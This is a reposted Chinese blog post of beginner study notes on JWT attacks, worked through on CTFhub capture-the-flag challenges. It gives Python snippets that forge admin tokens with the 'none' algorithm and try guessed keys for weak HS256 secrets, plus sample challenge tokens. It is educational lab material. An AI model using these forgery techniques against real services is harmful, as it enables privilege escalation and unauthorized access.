-------已搬运-------jwt入门学习

最新推荐文章于 2023-08-23 15:53:14 发布
最新推荐文章于 2023-08-23 15:53:14 发布
阅读量352 收藏 1
点赞数
文章标签: python jwt 加密解密
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zero_Adam/article/details/114645933
版权
本文介绍了JWT的基础知识,包括其在现代web应用中的作用和签名的重要性。讨论了JWT的攻击方式,如弱密钥爆破、禁用哈希以及未校验签名。还分享了使用Python进行JWT加密、解密及爆破弱密码的方法,并提供了相关资源链接。
摘要由CSDN通过智能技术生成

目录:

jwt不难,问题是在,找打secret_key,这个比较难搞,

一、 jwt基础知识学习:

现代 web 应用中替代 cookie 表示用户身份凭证的载体。形式类似 base64,但使用了 base64 可用字符空间之外的点字符,且无法直接解码。HTTP 报文中一旦发现 JWT,应重点关注。一时没想起,这不就是现代 web 常用的 JWT 么,服务端对 JWT 实现不好,容易导致垂直越权。

比如,把第二段的 user 字段值从 nana 篡改 admin。但是,JWT 的签名(也就是上面的第三部分),是对信息头和数据两部分结合密钥进行哈希而得,服务端通过签名来确保数据的完整性和有效性,正因如此,由于我无法提供密钥,所以,篡改后的 token 到达服务端后,无法通过签名校验,导致越权失败

1.小trick

secret可能在404页面,或者其他奇奇怪怪的地方,这个要细心一点。

二、、攻击jwt的入门的几种方式

在这里插入图片描述

1. 爆破弱密钥:

这个就很简单,了,

https://blog.csdn.net/Zero_Adam/article/details/114101169

2. 禁用哈希,也就是不用secret-key

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可惜了,没有成功,
但是这个题是成功的哦。。。

https://blog.csdn.net/Zero_Adam/article/details/114645263

3. 未校验签名,,,

这个最low,,,
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可能 服务端就没有进行校验,,然后就成功了,,,,
可能性贼少,,,

三、使用python

3. python加密jwt

# -*- coding: utf-8 -*-

import jwt
token = jwt.encode(
{
    # 这些都不是必须要的,都是我们传入的参数,
  "secretid": 12,
  "username": "admin",
  "password": "penson"
},
# 加密算法 none, None nOne,使用none的时候,有时候JWT会对 大小写敏感,所以可以多试一试。
# 加密算法,       加密密钥
algorithm="none",key=""
)
print(token)

加密算法 none, None nOne,使用none的时候,有时候JWT会对 大小写敏感,所以可以多试一试。

加密算法,对称算法HS256,这个比较常见,可能有 弱密钥爆破,

非对称算法RS256.非对称算法,可以使用将非对称算法转换为对称算法的这个方法,来实践密钥的爆破。

4. python解密jwt


import jwt# 将上面生成的 jwt 进行解析认证
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJuYW1lIjoiYWRtaW4ifQ.DOOiRIK3kQgVcKba_HzzvgNYaPOQqCFQpy4eil_AOeM"
data = None
try:
    print (1)
    key="222" # 这里可以写爆破算法
    #      需要解析的 jwt        密钥                使用和加密时相同的算法
    data = jwt.decode(token, key, algorithms=['HS256'])
    # 解析出来的就是 payload 内的数据
    print(data)  # 输出: {'name': 'admin'}
    # 报错的会话,就把algorithms的列表去掉,

except Exception as e:
    print ("error")
    #如果 jwt 被篡改过; 或者算法不正确; 如果设置有效时间, 过了有效期; 或者密钥不相同; 都会抛出相应的异常
    print(e)

输出结果:
在这里插入图片描述

注意:algorithms用的是数组里面放字符串的方法,

在这里插入图片描述

5. python爆破 jwt弱密码

一、配套学习CTFhub上的

1. 敏感信息泄露:

直接给了jwt。

eyJBRyI6ImEzZjk5NTAwYWFlN2QwZX0iLCJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFzZGYiLCJwYXNzd29yZCI6ImFzZGYiLCJGTCI6ImN0Zmh1YntkYTEyM2Q1NmYifQ.HXJ8OpGk8NcsQsxjTB13utXqpKqPWOc_IZrk_aSt0eI

但是用python脚本解密会出错,也对,需要解密密钥,但是我们 没有,然后python就会报错。,,那么就简单的base64解密,或者去jwt解密官网上去就好了。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.无签名,,可能就是指的是加密算法为none把,可以多换一换

明示改成admin,,,

在这里插入图片描述

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFzZGYiLCJwYXNzd29yZCI6ImFzZGYiLCJyb2xlIjoiZ3Vlc3QifQ.J-nwCXxSmrQkZp7RIvGwKkSyF2iLN5efTFtz4n9YtSM

,,,python脚本解码,还是不行,,用python解码jwt,,看来就一定要是正确才行了。。还是就用其他的两个解码来吧,

在这里插入图片描述
提示无签名:

import jwt
token = jwt.encode(
{
    # 这些都不是必须要的,都是我们传入的参数,
  "role":"admin",
  "username": "asdf",
  "password": "asdf"
},
# 加密算法 none, None nOne,使用none的时候,有时候JWT会对 大小写敏感,所以可以多试一试。
# 加密算法,       加密密钥
algorithm="none",key=""
# algorithm=None 这样也行,也是可以的。
)

print(token)

这两个加密方法都是可以的。
在这里插入图片描述

换上就有了。但是还是有点问题。
在这里插入图片描述

3. 弱密钥

在这里插入图片描述

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFzZGYiLCJwYXNzd29yZCI6ImFzZGYiLCJyb2xlIjoiZ3Vlc3QifQ.9fjWGarRvndQru6uDV7mhTwEFGGknfPKQ3ZZWVcleOo

之前的工具有个爆破jwt的密钥的,,但是我没有jwt的密钥的字典啊 ,,,

爆破的操作看这个把,

4. 修改签名算法,

非对称算法,,就是不一样。
方法看这个:这个这个这个

在这里插入图片描述

Zero_Adam
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
java-jwt-3.1.0.jar
04-28
java-jwt-3.1.0.jar
python自带jwt库使用
yutaixin的博客
11-29 2214
import jwt import time #加密 jwt.encode({payload},key,algorithm) #key:自定义的字节串或字符串 #payload:具体内容自己添加,分为公有声明和私有声明,字典类型 #algorithm:使用的哈希算法 #返回值为字节串 #示例: key = xxx exp = yyy now_time = time.time() token = ...
jwt的概念以及在Python中使用JWT
非空盒子的博客
03-07 491
先理解他是什么: Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准,通用性比较好,由header,payload,signature组成 再解释下什么是头部、载荷、签证: 头部用来声明类型和加密算法,载荷用来存储有效信息,签证包括头部 载荷和secret, 这个secret用来签发token和验证token,保存在服务端(比如redis)...
Python JWT 认证使用
Ghjkku的博客
02-07 472
根据官网的定义,是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。
python jwt token登入 介绍及生成
qq_60954460的博客
09-29 1370
python是我们常见的以及最简单的编程语言之一,它拥有很多的三方模块,下面介绍jwt token的应用。
JWT
weixin_44750790的博客
05-15 186
JWT
java-jwt-3.11.0.jar
03-01
java-jwt-3.11.0.jar
spring-security-jwt-demo.zip
11-19
《Spring Security与JWT整合实战详解》 在现代Web应用程序中,安全性和..."spring-security-jwt-demo"项目提供了一个具体的实现示例,可以帮助开发者更好地理解和应用这些概念,为构建安全的Web应用程序提供有力支持。
gin-jwt:JWT Gin中间件框架
04-28
用于Gin框架的JWT中间件 这是框架的中间件。 它使用提供jwt身份验证中间件。 它提供了其他处理程序功能以提供将生成令牌的login api和可用于刷新令牌的其他refresh处理程序。 安全问题 简单的HS256 JWT令牌暴力...
socket-auth-jwt
05-18
SocketIO-jwt演示 此套接字身份验证演示是基于。 JWT令牌在建立连接时从客户端传递。 在服务器端,将验证令牌,并为有效令牌建立连接。 启动服务器,然后转到localhost:3000。 使用任何用户名/密码登录。 它将...
Python Web 开发之 JWT 简介
最新发布
qq_36594703的博客
08-23 806
为了解决 Session 的问题,有了 token 的验证方式。token 可以理解成票据,或者凭证,当用户得到服务器的认证后,由服务器颁发,在之后的请求时携带,免去频繁登录。token 不同于 Session 的地方:可以独立于具体的服务器框架生成和校验可以携带更多的信息,避免对持久层的查询操作基于标准的算法可以由不同的节点完成验证。
pythonjwt的使用
唯有代码让我痴狂
02-27 760
【代码】pythonjwt的使用。
Python操作 JWT(python-jose包)、哈希(passlib包)、用户验证完整流程
Null的博客
01-18 6821
JWT 即JSON 网络令牌JWT(JSON Web Token) 是一种用于在身份提供者和服务提供者之间传递身份验证和授权数据的开放标准。JWT是一个JSON对象,其中包含了被签名的声明。这些声明可以是身份验证的声明、授权的声明等。JWT可以使用数字签名进行签名,以确保它不被篡改。JWT 是一种将 JSON 对象编码为没有空格,且难以理解的长字符串的标准。JWT 字符串没有加密,任何人都能用它恢复原始信息。jwt官网及在线解码但 JWT 使用了签名机制。接受令牌时,可以用签名校验令牌。
Python JWT 介绍
m0_56477185的博客
02-27 3638
JWT 全称: json-web-token JWT的大白话解释: 现在比较火的token中的一种,为了解决HTTP协议无状态的问题,开发出来的。就是一种解决方案。 1. 三大组成 JWT和cookie、session相比: 第一部分 header 在Python来看就是一个字典格式,元数据如下: {'alg':'HS256', 'typ':'JWT'} # alg代表要使用的 算法 HMAC-SHA256 简写HS256 # typ表明该token的类别 此处必须为 大写的
PythonJWT-Json Web Token的使用
zizle_lin的博客
11-29 974
1 下载安装PyJWT。我这里使用的版本是1.7.1,环境Python3.6.3 pip install PyJWT==1.7.1 2 导入生成JWT import jwt # 设置payload token_dict = { 'iat': time.time(), 'name': 'xxx' # 可加入自定义的参数 } """ payload一些固定参数的介绍,如上面的‘iat’. is...
Python 生成 JWT(json web token) 及 解析方式
python学习者的博客
12-23 3614
一.python 对于 jwt 的实现, 目前已经存在了一些第三方的库, 相信学习python 的程序猿都知道 itsdangerous 这个库了, 它的底层原理就是基于 jwt 进行实现的 这里需要进行提醒的是: itsdangerous (使用固定密钥/字符串进行加密, jwt 有多种加密方式, 这只是其中一种, 建议先去了解一下)所生成的 token 仍然是可以被破译从而看到 jwt 的...
JWT攻击手册(附jwt_tool用法,爆破弱密钥等)
热门推荐
weixin_50464560的博客
10-01 1万+
转载至https://www.cnblogs.com/xiaozi/p/12005929.html JSON Web Token(JWT)对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键,而且还被视为隐藏了通往以下特权的途径:特权升级,信息泄露,SQLi,XSS,SSRF,RCE,LFI等 ,可能还有更多!攻击令牌的过程显然取决于您正在测试的JWT配置和实现的情况,但是在测试JWT时,通过对目标服务的Web请求中使用的Token进行读取,篡改和签名,可能遇到已知的
JWT Authorization in Python aiohttp
Nero_G的博客
10-08 1979
锲子 最近开始转战Python后台,正在开始使用异步的aiohttp。由于是新的框架,参考资料少之又少。尤其是习惯了用ORM模型,但是aiohttp不支持,无奈只能慢慢来。 好了进入正题,十一回来开始搞oAuth token(刚开始一个新的项目),之前有用过itsdangerous,然后wenzhi大神推荐了JWT,接下来记录一下在aiohttp中使用JWT
Jwt
猎户星座
06-02 532
一、搭建项目结构 1、新建一个Maven项目,项目结构如图所示 2、SpringMvcConfig文件 package com.yj.config; import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.ComponentScan; imp...
MPLS-TP架构考虑:JWT报告
RFC5317是IETF(互联网工程任务组)和ITU-T(国际电信联盟电信标准部门)联合工作团队(JWT)关于MPLS-TP的报告,详述了在构建传输网络时对MPLS架构的考虑。 此报告的发布日期为2009年2月,它并非定义互联网标准的...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值